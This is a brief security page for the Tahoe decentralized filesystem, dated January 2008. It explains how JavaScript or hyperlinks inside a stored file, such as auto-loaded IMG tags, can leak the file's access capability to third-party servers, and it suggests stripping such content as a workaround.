Security Considerations

This page exists so that there is a single place to go to learn about the general security properties of Tahoe, as well as about any current known issues that might have security consequences.

Current Known Security Issues in Tahoe

as of January 8, 2008

• potential exposure of a file through embedded hyperlinks or JavaScript in that file

If there is a file stored on a Tahoe storage grid, and that file gets downloaded and displayed in a web browser, then JavaScript or hyperlinks within that file can leak the capability to that file to a third party, which means that third party gets access to the file.

If there is JavaScript in the file, then it could deliberately leak the capability to the file out to some remote listener.

If there are hyperlinks in the file, and they get followed, then whichever server they point to receives the capability to the file. Note that IMG tags are typically followed automatically by web browsers, so being careful which hyperlinks you click on is not sufficient to prevent this from happening.

For future versions of Tahoe, we are considering ways to close off this leakage of authority while preserving ease of use -- the discussion of this issue is ticket #127.

For the present, a good work-around is that if you want to store and view a file on Tahoe and you want that file to remain private, then remove from that file any hyperlinks pointing to other people's servers and remove any JavaScript unless you are sure that the JavaScript is not written to maliciously leak access.

General Security Properties of Tahoe

This will eventually be a summary of the general properties of the Tahoe secure decentralized filesystem.

For technical details, there is the architecture document.